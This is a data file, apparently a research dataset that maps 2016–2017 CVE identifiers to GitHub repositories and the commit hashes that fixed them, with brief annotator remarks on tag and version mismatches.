-CVE-2016-6304;https://github.com/openssl/openssl;None:None;False;e408c09bbf7c3057bda4b8d20bec1b3a7771c15b,2c0d295e26306e15a92eb23a84a1802005c1c137,a59ab1c4dd27a4c7c6e88f3c33747532fd144412,ea39b16b71e4e72a228a4535bd6d6a02c5edbc1f; -CVE-2016-6519;https://github.com/openstack/manila-ui;None:None;False;fca19a1b0d42536644212c5d673fbd6866e67c43,eed69d6ac444c27981f7548c7e2fbc37e836c28d,009913d725bee34cef0bd62e47a298025ace2696,89593686ef18f2bd06223b92071b4be2362a5abd; -CVE-2016-6580;https://github.com/python-hyper/priority;None:None;False;7d01a7dc4db83bce50f20d47caf4f37b403a3ecd,1d6321a387d2becaf66dc22a84db31fbbf7f8d51; -CVE-2016-6581;https://github.com/python-hyper/hpack;None:None;False;4529c1632a356cc1ab6a7fdddccd2de60a21e366,940e7d246ed5ecafb6b93be79f90d920b5ece459,15654460f247dd4fae7fa42ab02bd037b352d1b8; -CVE-2016-6652;https://github.com/spring-projects/spring-data-jpa;None:None;False;b8e7fecccc7dc8edcabb4704656a7abe6352c08f,e9bd83f820b98c54d0b5a2ec0f3f1767332a862c,a22c17fc12f7063716cb40c11d1ff4e265ef8556,edd497b9c93b4f364ffc78ca302a05938d499271; vulnerable tag is fixed -CVE-2016-6793;https://github.com/apache/wicket;None:None;False;8faa056f35bb1fe0b21a92d0450a5aadad8f7753,134686ef7185d3f96fec953136ab4847cd36b68d; vulnerable tag is fixed -CVE-2016-6794;https://github.com/apache/tomcat;None:None;False;0b41766456b1980e4f809e13ad6dc9fa912bae7e,f8db078f1e6e8b225f8344e63595113ca34cd408,c1660182010b4255c21c874d69c124370a67784a; fixed tag is vulnerable (changed) -CVE-2016-6796;https://github.com/apache/tomcat;None:None;False;f603f2f4595073f9490e01699d2083112a7c09a7,f97769f50ee2613e1bf27107a01d48907fd993ac,ffa0346fba2946401630291b642f1cff66d6a2be,fb65c5fe6d298195beee11324416a975bea6d701,bec54243e09b4a171f0a0672e5d8d3cdb281f926,1d69a4ddb363ee96b41337495eb7a263f2e01ff7; fixed tag is vulnerable (changed) -CVE-2016-6797;https://github.com/apache/tomcat;None:None;False;b3406e6c318378cbf440f902f9fdbb8b440aef4e,d6b5600afe75e1086dd564344e1d085966e4237d,2859ac3eae132383cb6f3f2042e25d7a4a281b0d; fixed tag is vulnerable (changed) -CVE-2016-6801;https://github.com/apache/jackrabbit;None:None;False;0c00609a172b3af3b86a01abbf5ed473214702ba,4d21cc25649e547520963b0f87300d656050e68c,67f2cc1ac78cd7bb721d556e8be27559efbf4e12,ea75d7c2aeaafecd9ab97736bf81c5616f703244,7fb4ba4a385069378c916b4fac3f145db802acd8,fb4fe3601717201934bcbf6eb604d2e1ef2cb7ad,991cc31a6cc3a5f87fa7951afb939ff7859db789,9e08618c73a852710cfd9904b8558ceb5c1b754c,eae001a54aae9c243ac06b5c8f711b2cb2038700; -CVE-2016-6814;https://github.com/apache/groovy;None:None;False;716d3e67e744c7edeed7cbc3f874090d39355764,4df8b652aa018a5d5d1cda8fba938bf3422db31c; -CVE-2016-6816;https://github.com/apache/tomcat;None:None;False;f96f5751d418ae5a2f550be040daf9c5f7d99256,516bda676ac8d0284da3e0295a7df70391315360,cdc0a935c2173aff60039a0b85e57a461381107c; fixed tag is vulnerable (changed) -CVE-2016-6817;https://github.com/apache/tomcat;None:None;False;079372fc7bac8e2e378942715c9ce26a4a72c07a,85c63227edabbfb4f2f500fc557480a190135d21,8568a2ca230f4fb6aee483eb40fc7e3f28bc8b96; -CVE-2016-6823;https://github.com/ImageMagick/ImageMagick;None:None;False;4cc6ec8a4197d4c008577127736bf7985d632323,c1cf4802653970c050d175a6496fa1f11b7c089e; -CVE-2016-7036;https://github.com/mpdavis/python-jose;None:None;False;73007d6887a7517ac07c6e755e494baee49ef513,89b46353b9f611e9da38de3d2fedf52331167b93; -CVE-2016-7528;https://github.com/ImageMagick/ImageMagick;None:None;False;7be16a280014f895a951db4948df316a23dabc09; -CVE-2016-7569;https://github.com/appc/docker2aci;None:None;False;2ab8826d6957d97ed64e5e29a484af6370eae2e1,54331ec7020e102935c31096f336d31f6400064f,e371d6523193342d193bcef9f446e14d09eefc4d; -CVE-2016-8568;https://github.com/libgit2/libgit2;None:None;False;aae89534961cdb7b445be890a056b67c5d18547f,4974e3a59648095ffa6fce6c5b651a820c0c34b9,dfc2c713433b3a932e4d8b648738e3b63086baec,821042b673675546a265827ea184c6fa14e0623d,a719ef5e6d4a1a8ec53469c7914032ed67922772; -CVE-2016-8569;https://github.com/libgit2/libgit2;None:None;False;dfc2c713433b3a932e4d8b648738e3b63086baec,821042b673675546a265827ea184c6fa14e0623d,aae89534961cdb7b445be890a056b67c5d18547f,4974e3a59648095ffa6fce6c5b651a820c0c34b9,a719ef5e6d4a1a8ec53469c7914032ed67922772; -CVE-2016-8579;https://github.com/appc/docker2aci;None:None;False;2ab8826d6957d97ed64e5e29a484af6370eae2e1,54331ec7020e102935c31096f336d31f6400064f,e371d6523193342d193bcef9f446e14d09eefc4d; -CVE-2016-8610;https://github.com/openssl/openssl;None:None;False;af58be768ebb690f78530f796e92b8ae5c9a4401,22646a075e75991b4e8f5d67171e45a6aead5b48; -CVE-2016-8629;https://github.com/keycloak/keycloak;None:None;False;a78cfa4b2ca979a1981fb371cfdf2c7212f7b6e2,3d46b4c425d39b004566cc78164e1ffbe37d647c; -CVE-2016-8640;https://github.com/geopython/pycsw;None:None;False;2565ab332d3ccae328591ea9054d0387a90f2e86,d83df944b1fc0f266444c31852c7730f0f41db87,522873e5ce48bb9cbd4e7e8168ca881ce709c222,69546e13527c82e4f9191769215490381ad511b2,daaf09b4b920708a415be3c7f446739661ba3753; -CVE-2016-8738;https://github.com/apache/struts;None:None;False;554b9dddb0fbd1e581ef577dd62a7c22955ad0f6; -CVE-2016-8739;https://github.com/apache/cxf;None:None;False;8e4970d931ae72f92c54d170a844b37137b8fda6,9deb2d179758d3da47ce3ea492c2606c0a6a8475,d9e2a6e7260ea12efa5355ffdfbf0b2415bccd14; -CVE-2016-8745;https://github.com/apache/tomcat;None:None;False;16a57bc885e212839f1d717b94b01d154a36943a,cbc9b18a845d3c8c053ac293dffda6c6c19dd92b,143bb466cf96a89e791b7db5626055ea819dad89; test file... -CVE-2016-8747;https://github.com/apache/tomcat;None:None;False;9601a937ff3b7ef5d04b2a0e950d0e44e1bb4cbd,452c8094a665ef6375530e81c033da4eeb2e4865; -CVE-2016-8750;https://github.com/apache/karaf;None:None;False;ff5792d9b19997318c487bd23edb2c5063ca88c6,ac07cb2440ceff94b3001728c1611fc471253d19; -CVE-2016-8867;https://github.com/moby/moby;None:None;False;ed879071ecff0e082ae6e59481f640f89ea87013,d60a3418d0268745dff38947bc8c929fbd24f837; -CVE-2016-9015;https://github.com/hbashton/urllib3;None:None;False;056045a062478e3c3afc2402ec81680d53490876,5e36a7096455ea94fb28b623d64e1f1bad97f822; -CVE-2016-9121;https://github.com/square/go-jose;None:None;False;c7581939a3656bb65e89d64da0a52364a33d2507,7f0dd807d3f3d73bb536898cb7980ddf638ce69a,60e9804a61881698227b7b19c0a11d49d6930e4f; -CVE-2016-9122;https://github.com/square/go-jose;None:None;False;2c5656adca9909843c4ff50acf1d2cf8f32da7e6,350b3415970b0dd6d2ffe4574d5fc0a71a900562; -CVE-2016-9189;https://github.com/python-pillow/Pillow;None:None;False;5fac61d03e1619db086e477c67b12189be6f84b6,fe7b41b4381325a83707ea9bbd0062812dc8dfc2,c50ebe6459a131a1ea8ca531f10da616d3ceaa0f; -CVE-2016-9190;https://github.com/python-pillow/Pillow;None:None;False;5fac61d03e1619db086e477c67b12189be6f84b6,5d8a0be45aad78c5a22c8d099118ee26ef8144af,d4663806a89d28e30cbb9f7eac7b03a04f09cb31; -CVE-2016-9243;https://github.com/pyca/cryptography;None:None;False;b924696b2e8731f39696584d12cceeb3aeb2d874,aebfba28a42b608a2c5f8bf7d45402c415b893a4; -CVE-2016-9298;https://github.com/ImageMagick/ImageMagick;None:None;False;3cbfb163cff9e5b8cdeace8312e9bfee810ed02b; -CVE-2016-9814;https://github.com/simplesamlphp/saml2;None:None;False;7008b0916426212c1cc2fc238b38ab9ebff0748c,f72e98a74083e54f49df2596d4520ae5d5fc80f6,3f268c25ca5e9748652834faad04525746227ef7,2a2bd4398257cbe72251c68348be72707cc77262; -CVE-2016-9878;https://github.com/spring-projects/spring-framework;None:None;False;e2d6e709c3c65a4951eb096843ee75d5200cfcad,a7dc48534ea501525f11369d369178a60c2f47d0,43bf008fbcd0d7945e2fcd5e30039bc4d74c7a98; -CVE-2016-9879;https://github.com/spring-projects/spring-security;None:None;False;6d30da2e1f166ceac339899295e1b8a8ff2f08c4,ed2ae21074b7850d386371b2ab9e29268ef2f0c0,666e356ebc479194ba51e43bb99fc42f849b6175; -CVE-2016-9909;https://github.com/html5lib/html5lib-python;None:None;False;9b8d8eb5afbc066b7fac9390f5ec75e5e8a7cab7; -CVE-2016-9910;https://github.com/html5lib/html5lib-python;None:None;False;9b8d8eb5afbc066b7fac9390f5ec75e5e8a7cab7; -CVE-2016-9962;https://github.com/opencontainers/runc;None:None;False;5d93fed3d27f1e2bab58bad13b180a7a81d0b378; -CVE-2016-10033;https://github.com/PHPMailer/PHPMailer;None:None;False;833c35fe39715c3d01934508987e97af1fbc1ba0,9743ff5c7ee16e8d49187bd2e11149afb9485eae,4835657cd639fbd09afd33307cef164edf807cdc,ed4e7ce8ad877a8f578139c491c256ab1933c7c9; -CVE-2016-10100;https://github.com/borgbackup/borg;None:None;False;f2f50efc2873636dc7acfcd222e21fe40fe667a5; -CVE-2016-10127;https://github.com/IdentityPython/pysaml2;None:None;False;8c2b0529efce45b94209da938c89ebdf0a79748d,6e09a25d9b4b7aa7a506853210a9a14100b8bc9b; -CVE-2016-10129;https://github.com/libgit2/libgit2;None:None;False;66e3774d279672ee51c3b54545a79d20d1ada834,2fdef641fd0dd2828bd948234ae86de75221a11a,921e3a68e26ad23d9c5b389fdc61c9591bdc4cff,ccee8cabc3fd187046bbfccb407de95dafc310f6,4ac39c76c0153d1ee6889a0984c39e97731684b2,84d30d569ada986f3eef527cbdb932643c2dd037; -CVE-2016-10149;https://github.com/IdentityPython/pysaml2;None:None;False;6e09a25d9b4b7aa7a506853210a9a14100b8bc9b; -CVE-2016-10173;https://github.com/halostatue/minitar;None:None;False;30e62689b614938dc96b4f2cb8e033e72f650670; -CVE-2016-10190;https://github.com/FFmpeg/FFmpeg;None:None;False;2a05c8f813de6f2278827734bf8102291e7484aa,606b21353df7d08ea203193f3026281737c696a2,2e3f0a1c6f39cf2a35bdda85e43970ffc6db797b,18e3e322b36a85b6f69662e1d5fa7c245638ab86,0e0a413725e0221e1a9d0b7595e22bf57e23a09c; -CVE-2016-10191;https://github.com/FFmpeg/FFmpeg;None:None;False;7d57ca4d9a75562fa32e40766211de150f8b3ee7,5bfb0b02b6fbb38c058659dc09c01602d0d1f523,a5513ae7bc7cb131e7b7edba57e4cf93121d6c8e,b0ebef0578fd88fe3efd66086c43a5b43fbc9f6a,32b95471a86ae383c0f76361d954aec511f7043a; -CVE-2016-10192;https://github.com/FFmpeg/FFmpeg;None:None;False;a5d25faa3f4b18dac737fdb35d0dd68eb0dc2156,e0cb113f9b4b7a26ac0053a483f92c26a4a90f0e,1768e02a046ac05cb212991ae23021ad412cd15a,37904d11779482f375b13da24f33f75daf13638f,c12ee64e80af2517005231388fdf4ea78f16bb0e; -CVE-2016-10193;https://github.com/dejan/espeak-ruby;None:None;False;5251744b13bdd9fb0c72c612226e72d330bac143,119b2d6691ed954c84ceaa6e41a6915e6ea01938; -CVE-2016-10345;https://github.com/phusion/passenger;None:None;False;e5b4b0824d6b648525b4bf63d9fa37e5beeae441; -CVE-2016-10522;https://github.com/sferik/rails_admin;None:None;False;b13e879eb93b661204e9fb5e55f7afa4f397537a; -CVE-2016-10524;https://github.com/oliversalzburg/i18n-node-angular;None:None;False;877720d2d9bb90dc8233706e81ffa03f99fc9dc8; -CVE-2016-10526;https://github.com/tschaub/grunt-gh-pages;None:None;False;2d277e3e969ccd4c2d493f3795400fa77e6b6342,590f69767203d8c379fe18cded93bd5ad6cb53cb; fixed tag is vulnerable -CVE-2016-10528;https://github.com/coderaiser/node-restafary;None:None;False;63e4b13c802991bbff2d0af8bd15b0bce9ff971a; -CVE-2016-10529;https://github.com/silverwind/droppy;None:None;False;62ae2cbc87e0e4b7b61205b3d926e275c8f1accc; -CVE-2016-10531;https://github.com/markedjs/marked;None:None;False;2cff85979be8e7a026a9aca35542c470cf5da523; commit outside the time range -CVE-2016-10532;https://github.com/cloudcmd/console-io;None:None;False;62f0fbcb36226436af0dad52ffe4d8cd9a0c533f; -CVE-2016-10536;https://github.com/socketio/engine.io-client;None:None;False;2c55b278a491bf45313ecc0825cf800e2f7ff5c1; -CVE-2016-10538;https://github.com/node-js-libs/cli;None:None;False;ed90515500557e2b82d6ce6004cc9a81fb090501,fd6bc4d2a901aabe0bb6067fbcc14a4fe3faa8b9; questa boh -CVE-2016-10540;https://github.com/isaacs/minimatch;None:None;False;6944abf9e0694bd22fd9dad293faa40c2bc8a955; -CVE-2016-10542;https://github.com/websockets/ws;None:None;False;0328a8f49f004f98d2913016214e93b2fc2713bc,3e1caf42088c7cd236f23b972917588368ad8531; -CVE-2016-10543;https://github.com/hapijs/call;None:None;False;9570eee5358b4383715cc6a13cb95971678efd30; -CVE-2016-10544;https://github.com/uNetworking/uWebSockets;None:None;False;37deefd01f0875e133ea967122e3a5e421b8fcd9; -CVE-2016-10550;https://github.com/sequelize/sequelize;None:None;False;d198d78182cbf1ea3ef1706740b35813a6aa0838; -CVE-2016-10554;https://github.com/sequelize/sequelize;None:None;False;c876192aa6ce1f67e22b26a4d175b8478615f42d; -CVE-2016-10555;https://github.com/hokaccha/node-jwt-simple;None:None;False;957957cfa44474049b4603b293569588ee9ffd97,ecf908a57fce953b5daf0139bcff85eca869a630; vulnerable tag is fixed -CVE-2016-10556;https://github.com/sequelize/sequelize;None:None;False;23952a2b020cc3571f090e67dae7feb084e1be71; -CVE-2016-10557;https://github.com/appium/appium-chromedriver;None:None;False;c5a4caa8c45cd7842537c2031a77a5273cc198c8,c7e384afcddf009636b8e5bb23b1f06150eda293; -CVE-2016-10558;https://github.com/aerospike/aerospike-client-nodejs;None:None;False;d5e916a3a65c169e60200f18f02524c67bb58237; the fixing commit changes a bash script file and some .ini files, while from the advisory we are filtering out only .js files -CVE-2016-10559;https://github.com/groupon/selenium-download;None:None;False;1957ca79707b9bee224b222500ceb250f736b93b; -CVE-2016-10560;https://github.com/hypery2k/galenframework-cli;None:None;False;dcf9505f77f2ea50f84372f9b6b521c89561cbe1; -CVE-2016-10562;https://github.com/barretts/node-iedriver;None:None;False;32ca1602573618c8d76182c4f2a30aee379d6629; this repo has no tag, current timespan gives zero commits -CVE-2016-10564;https://github.com/rubenv/node-apk-parser;None:None;False;5e359c08ba57775857d309c57f9830f19b1cf774; -CVE-2016-10566;https://github.com/davidmarkclements/install-nw;None:None;False;5c64eff1ed116fceeba55a51867554f0fe4f6556; same as above -CVE-2016-10567;https://github.com/connected-web/product-monitor;None:None;False;122122c605a235d5897590c0ef9d3682961707de; -CVE-2016-10568;https://github.com/geoip-lite/node-geoip;None:None;False;29f9db3f25d6d6364e3e2ab274713e6f81e8c695; fixed tag is vulnerable -CVE-2016-10569;https://github.com/nodeca/embedza;None:None;False;19ab5ed72c37a311ba2685f4ef4ed08b3b5c95c3; -CVE-2016-10570;https://github.com/jefflembeck/pngcrush-installer;None:None;False;cf36e9a5492a591493836b7fea69ae3ec34f7f75,d56bc439fc6ed0654b30b345906f77bd000368f3; -CVE-2016-10571;https://github.com/vseryakov/bkjs-wand;None:None;False;3b8d854dd765546ecb77282a6f87406746378dcf; this repo has no tag, current timespan gives zero commits -CVE-2016-10572;https://github.com/Janpot/mongodb-instance;None:None;False;c8fea750f8020ace8410c442b2684b33a9fddd3b; same as above -CVE-2016-10573;https://github.com/tobli/baryton-saxophone;None:None;False;a5e943c46779e5372cdd13bfe2a69ec2530045be; -CVE-2016-10574;https://github.com/zhao0/node-apk-parser3;None:None;False;ba1ade7f677dc5c80fe3f7355794d501b61a7917; -CVE-2016-10575;https://github.com/hakatashi/kindlegen;None:None;False;9a67ba62890ab78597f4c3af36b97e19ea410fa4; -CVE-2016-10576;https://github.com/zazukoians/fuseki;None:None;False;154c0f12c468a8af33562dff12b1bb0e5b659df9; same as above -CVE-2016-10577;https://github.com/ibmdb/node-ibm_db;None:None;False;d7e2d4b4cbeb6f067df8bba7d0b2ac5d40fcfc19; -CVE-2016-10579;https://github.com/giggio/node-chromedriver;None:None;False;71981099216b7c15ec01e50baaacb15fe1b85e56,5ad68a36c3260760f1eb40d9c7906c6ea19c05b3; was 2.26.0:2.26.1 -CVE-2016-10582;https://github.com/dcodeIO/ClosureCompiler.js;None:None;False;c01efe9d86dc8d07e14c5a6ba1586244ce53a698,e59848f5975e5b15279c044daf9cff8ff192bae6; -CVE-2016-10586;https://github.com/macacajs/macaca-chromedriver;None:None;False;03cb4a186b83122383bc2292761d418f519bf3b9; current timespan gives only ten commits -CVE-2016-10587;https://github.com/wasdk/wasdk;None:None;False;58c2d22e7958d921e4f90d56805460ca33918971; this repo has no tag, current timespan gives zero commits -CVE-2016-10588;https://github.com/nwjs/npm-installer;None:None;False;adb4df1e012d38a3872578d484291b9af07aad5b; unknown -CVE-2016-10591;https://github.com/rse/node-prince;None:None;False;c7e355bd3d3e4bc060f102c5264e838f379aa8a8; -CVE-2016-10611;https://github.com/Strider-CD/strider-sauce;None:None;False;5ff6d6593f89aee505b4e86958ab6f8898baa9eb; -CVE-2016-10626;https://github.com/koorchik/node-mystem3;None:None;False;4bd31c0e0110afc327c414d7ebfc2ffe738cbad2; -CVE-2016-10694;https://github.com/tobli/alto-saxophone;None:None;False;ef8d579ae68a95027afd5204ca644cf00cf72b70; -CVE-2016-10703;https://github.com/jfhbrook/node-ecstatic;None:None;False;71ce93988ead4b561a8592168c72143907189f01; -CVE-2016-10735;https://github.com/twbs/bootstrap;None:None;False;bcad4bcb5f5a9ef079b2883a48a698b35261e083; -CVE-2016-10745;https://github.com/pallets/jinja;None:None;False;9b53045c34e61013dc8f09b7e52a555fa16bed16,74bd64e56387f5b2931040dc7235a3509cde1611; -CVE-2016-10750;https://github.com/hazelcast/hazelcast;None:None;False;5a47697519018eb4918df33a21faae811e85f01a,ef4bea032d9f662bd63c690f4c1d6a2bcea6c2a7; vulnerable tag is fixed + commit timestamp is outside the time interval -CVE-2016-1000232;https://github.com/salesforce/tough-cookie;None:None;False;e4fc2e0f9ee1b7a818d68f0ac7ea696f377b1534,615627206357d997d5e6ff9da158997de05235ae; -CVE-2016-1000236;https://github.com/tj/node-cookie-signature;None:None;False;39791081692e9e14aa62855369e1c7f80fbfd50e; -CVE-2016-1000282;https://github.com/haraka/Haraka;None:None;False;2998b8b0455b8cc2c640344328439e10e685aad9,816af2f47755d36cdcd69f888b173b7ed24d3d89,a772fccad35475dfc66a0ac0c60a60322189f1f5,468fd214ca3ba58ac4b371bd7f7609ca9b1a6699; -CVE-2016-1000338;https://github.com/bcgit/bc-java;None:None;False;b0c3ce99d43d73a096268831d0d120ffc89eac7f; -CVE-2016-1000340;https://github.com/bcgit/bc-java;None:None;False;790642084c4e0cadd47352054f868cc8397e2c00; -CVE-2016-1000343;https://github.com/bcgit/bc-java;None:None;False;50a53068c094d6cff37659da33c9b4505becd389; -CVE-2016-1000344;https://github.com/bcgit/bc-java;None:None;False;9385b0ebd277724b167fe1d1456e3c112112be1f; -CVE-2017-0224;https://github.com/chakra-core/ChakraCore;None:None;False;f022afb8246acc98e74a887bb655ac512caf6e72; -CVE-2017-0904;https://github.com/jtdowney/private_address_check;None:None;False;58a0d7fe31de339c0117160567a5b33ad82b46af; -CVE-2017-0905;https://github.com/recurly/recurly-client-ruby;None:None;False;1bb0284d6e668b8b3d31167790ed6db1f6ccc4be,1605e72ae631d3d300815d23c9eb4d42c1ab2f7e,3b23f442e36a5cc7034abb997312761bd0c15a81,242252e37cdb36cf5bd526855feed388d54a6c7e,9ea7a7dd25778666c3501991df2dabbcfa60f93a,b480ea5118be44dc4a8ee50a501e402be943e9c6,08c4766b75b286193fcd41421d9303fc4d18f1c0,9834a8c6fecffc16f1e9e9c651b67fca07bf64d9,5ff4907e1c1a3d9356e0658ae43cec594b764f09,c8c36508c8acd81768909ad2d155462a9d50a3bd,a6ccc217daa166f8fbc12e32ddeb6d33cf43653e,2ee039868e54eb1bd9a219ff759f008140a9a16b,e540c6535980f216f6d6338c51d11ced3440518b; -CVE-2017-0906;https://github.com/recurly/recurly-client-python;None:None;False;049c74699ce93cf126feff06d632ea63fba36742,c993068ecca65956ec91282f4d15946dcdcf21e0,1af0c48131df43a2f40c41df540ea8b1886c402d,94d08c9ae78448112a61e8586f0253f4dce18485,02d648db134403e53588646084c9cbd9fb0a8177,bd199d12de021bf7e4d3b504d60a11dd0f0beeb6,37762f28f9a3559b603d726e56de899536c4a49d; -CVE-2017-0907;https://github.com/recurly/recurly-client-dotnet;None:None;False;9eef460c0084afd5c24d66220c8b7a381cf9a1f1,54d2f1992096495efb026a97518bb55c5bd70641,56b005dc464132c9c505454042c9d949ace9dc42,c20f49b6cb69564db1af657bdb98aa4ae1da31b5,69aef8ff955b174463e73e234b154eb915787cc3,8e05a530e494e6162997d5a551fefe5ff14d40f0,f0fc3715670a06736b1ba45e7b8a3a525444b524,efe4873ac652f7a992fe1460ec8c9330189b0410,a711b927c8917dd98dc3cecf9f799ba3f3b1d67d; -CVE-2017-0909;https://github.com/jtdowney/private_address_check;None:None;False;516ab853e788f1392f81b59cbe30e136f3836cdf,d1389cbc919aa9e7ef28a34335b104caab73288d,53b55b32dfebd4461a241e09b8af2dbe44d86ce5,6e614921aeee96fa5850f0f667618890754d19a5,6927b2e4ae1ed6c51d1e7639624cf43b0b0e8ba6,4ce63152a1aff6e01e31ff4cc134a485ab018dea; -CVE-2017-0929;https://github.com/dnnsoftware/Dnn.Platform;None:None;False;f7a48e4df93c027325578ff0649733d19e1894fa,d3953db85fee77bb5e6383747692c507ef8b94c3; -CVE-2017-2582;https://github.com/keycloak/keycloak;None:None;False;8a02ef18597e5929517d702238b09ae780eaf421,0cb5ba0f6e83162d221681f47b470c3042eef237; -CVE-2017-2592;https://github.com/openstack/oslo.middleware;None:None;False;ec073669a49267abcb0c1d776b9050342dac5a4a,6c0f50c1f5f4122b31dbfe25aacdce596bf4b648; -CVE-2017-2617;https://github.com/hawtio/hawtio;None:None;False;8cf6848f4d4d4917a4551c9aa49dc00f699eb569; -CVE-2017-2638;https://github.com/infinispan/infinispan;None:None;False;f2d54c4ecb75c7264d4160ca7c461135712201a9; -CVE-2017-2649;https://github.com/jenkinsci/active-directory-plugin;None:None;False;a5e92137dc1f892ebfb3e371725b787860ddb539,063c282ad258c020f1776a6c4b3d1b3f95d74aef; -CVE-2017-2652;https://github.com/jenkinsci/distfork-plugin;None:None;False;312bad498c9bce23a66bd2aba20d0d3de1e0cf8d; -CVE-2017-2667;https://github.com/theforeman/hammer-cli;None:None;False;74b926ae24f47f1d93b778e06b64935e57b60e33; -CVE-2017-2670;https://github.com/undertow-io/undertow;None:None;False;08d6eaf61dab51403990e1fffa4c1d53212e4722,3ad7537d0bfeed5950afda0428ea704e5f00d815,9bfe9fbbb595d51157b61693f072895f7dbadd1d; -CVE-2017-2809;https://github.com/tomoh1r/ansible-vault;None:None;False;3f8f659ef443ab870bb19f95d43543470168ae04; -CVE-2017-3156;https://github.com/apache/cxf;None:None;False;1338469f7d25cfcda75b547c68bed95bd97903ac,e66ce235ee5f8dbde467c8c23eeb622b072d0bf3,555843f9563ccfc2ca1afb2950aebb4505d7711b; -CVE-2017-3204;https://github.com/golang/crypto;None:None;False;e4e2799dd7aab89f583e1d898300d96367750991; -CVE-2017-4952;https://github.com/vmware-archive/xenon;None:None;False;ec30db9afada9cb52852082ce4d7d0095524f3b3,c23964eb57e846126daef98ef7ed15400313e977,b1fd306047ecdac82661d636ebee801a7f2b3a0a,7a747d82b80cd38d2c11a0d9cdedb71c722a2c75,aac1921a1e5480addb1101a513d93dc25de71b50,1a35836973a695157749b0bbbf45b8b2fdcecbd3,756d893573414eec8635c2aba2345c4dcf10b21c,5682ef8d40569afd00fb9a5933e7706bb5b66713,30ae41bccf418d88b52b35a81efb3c1304b798f8,06b9947cf603ba40fd8b03bfeb2e84528a7ab592; -CVE-2017-4971;https://github.com/spring-projects/spring-webflow;None:None;False;57f2ccb66946943fbf3b3f2165eac1c8eb6b1523,ec3d54d2305e6b6bce12f770fec67fe63008d45b; -CVE-2017-4973;https://github.com/cloudfoundry/uaa;None:None;False;9d44cb0c7c25ccae95bfa1c2d59ce46200c643cb; -CVE-2017-4995;https://github.com/spring-projects/spring-security;None:None;False;947d11f433b78294942cb5ea56e8aa5c3a0ca439,5dee8534cd1b92952d10cc56335b5d5856f48f3b; -CVE-2017-5209;https://github.com/libimobiledevice/libplist;None:None;False;3a55ddd3c4c11ce75a86afbefd085d8d397ff957; -CVE-2017-5537;https://github.com/WeblateOrg/weblate;None:None;False;46e7e58af7fba25f9e68a1e962e339da8e829f3b,abe0d2a29a1d8e896bfe829c8461bf8b391f1079; -CVE-2017-5545;https://github.com/libimobiledevice/libplist;None:None;False;7391a506352c009fe044dead7baad9e22dd279ee; -CVE-2017-5591;https://github.com/poezio/slixmpp;None:None;False;22664ee7b86c8e010f312b66d12590fb47160ad8; -CVE-2017-5594;https://github.com/pagekit/pagekit;None:None;False;e0454f9c037c427a5ff76a57e78dbf8cc00c268b,17cc46211ccb3588cc83be96ffa1b971e38d26f0; -CVE-2017-5637;https://github.com/apache/zookeeper;None:None;False;5fe68506f217246c7ebd96803f9c78e13ec2f11a,0313a0e0b6c47b316271533165e5830d1ca04478,835377f0e1cd215e791ed29c0bcff95e625f299c,6d9fc04c052adbc79bbbb1c63f3f00c816fb8e56; -CVE-2017-5638;https://github.com/apache/struts;None:None;False;352306493971e7d5a756d61780d57a76eb1f519a,6b8272ce47160036ed120a48345d9aa884477228; fixed tag is vulnerable (changed) (adv specify wrong) -CVE-2017-5641;https://github.com/apache/flex-blazeds;None:None;False;f861f0993c35e664906609cad275e45a71e2aaf1; -CVE-2017-5643;https://github.com/apache/camel;None:None;False;8afc5d1757795fde715902067360af5d90f046da,2c6964ae94d8f9a9c9a32e5ae5a0b794e8b8d3be,9f7376abbff7434794f2c7c2909e02bac232fb5b; extracted wrong vers from CPE. -CVE-2017-5645;https://github.com/apache/logging-log4j2;None:None;False;5dcc19215827db29c993d0305ee2b0d8dd05939d; -CVE-2017-5858;https://github.com/conversejs/converse.js;None:None;False;e81eaf323ef241f364f0ea8b6abb53439e20efcc; -CVE-2017-5934;https://github.com/moinwiki/moin-1.9;None:None;False;70955a8eae091cc88fd9a6e510177e70289ec024; -CVE-2017-5936;https://github.com/openstack-archive/nova-lxd;None:None;False;1b76cefb92081efa1e88cd8f330253f857028bd2; -CVE-2017-5946;https://github.com/rubyzip/rubyzip;None:None;False;ce4208fdecc2ad079b05d3c49d70fe6ed1d07016; -CVE-2017-5954;https://github.com/commenthol/serialize-to-js;None:None;False;0cea49eeb56eb30f6ee121524b7ea8ed208ab10d,1cd433960e5b9db4c0b537afb28366198a319429; -CVE-2017-7481;https://github.com/ansible/ansible;None:None;False;f0e348f5eeb70c1fb3127d90891da43b5c0a9d29,a1886911fcf4b691130cfc70dfc5daa5e07c46a3,fd30f5328986f9e1da434474481f32bf918a600c,ed56f51f185a1ffd7ea57130d260098686fcc7c2; -CVE-2017-7525;https://github.com/FasterXML/jackson-databind;None:None;False;60d459cedcf079c6106ae7da2ac562bc32dcabe1,6ce32ffd18facac6abdbbf559c817b47fcb622c1; one was wrong from tracer, another was just test files the one in advisory does not exist is from another repo -CVE-2017-7536;https://github.com/hibernate/hibernate-validator;None:None;False;0886e89900d343ea20fde5137c9a3086e6da9ac9,0ed45f37c4680998167179e631113a2c9cb5d113,0778a5c98b817771a645c6f4ba0b28dd8b5437b8; -CVE-2017-7540;https://github.com/svenfuchs/safemode;None:None;False;a019520e441dab1a277fa9aeb41e9266783e9533; was 1.3.2:1.3.3 -CVE-2017-7545;https://github.com/kiegroup/jbpm-designer;None:None;False;a143f3b92a6a5a527d929d68c02a0c5d914ab81d,d9c355a53f0102e71cc668cd8fca440f5f46bdf1,cede7932601439cbc1c3708d0b5bb61f3601abe1; -CVE-2017-7653;https://github.com/eclipse/mosquitto;None:None;False;b11855821e5848fdbb6f66b609b2e1c25c7ddb8a,729a09310a7a56fbe5933b70b4588049da1a42b4; -CVE-2017-7654;https://github.com/eclipse/mosquitto;None:None;False;51ec5601c2ec523bf2973fdc1eca77335eafb8de; -CVE-2017-7656;https://github.com/eclipse/jetty.project;None:None;False;a285deea42fcab60d9edcf994e458c238a348b55; -CVE-2017-7657;https://github.com/eclipse/jetty.project;None:None;False;a285deea42fcab60d9edcf994e458c238a348b55,be8ff431a4b9b2e51c4c847512dfbc70166b8089; -CVE-2017-7660;https://github.com/apache/lucene-solr;None:None;False;e3b0cfff396a7f92a4f621d598780116da916f3f,2f5ecbcf9ed7a3a4fd37b5c55860ad8eace1beae,e912b7cb5c68fbb87b874d41068cf5a3aea17da0,9f91c619a35db89544f5c85795df4128c9f0d96a; -CVE-2017-7661;https://github.com/apache/cxf-fediz;None:None;False;acdbe8c213576792dd95d87315bcc181ea61b57f,f368c472e7beb26f8ca6f818eee8139d8caf2e6e,707b8f95395a3a9ba6d2643053578081e91e5673; 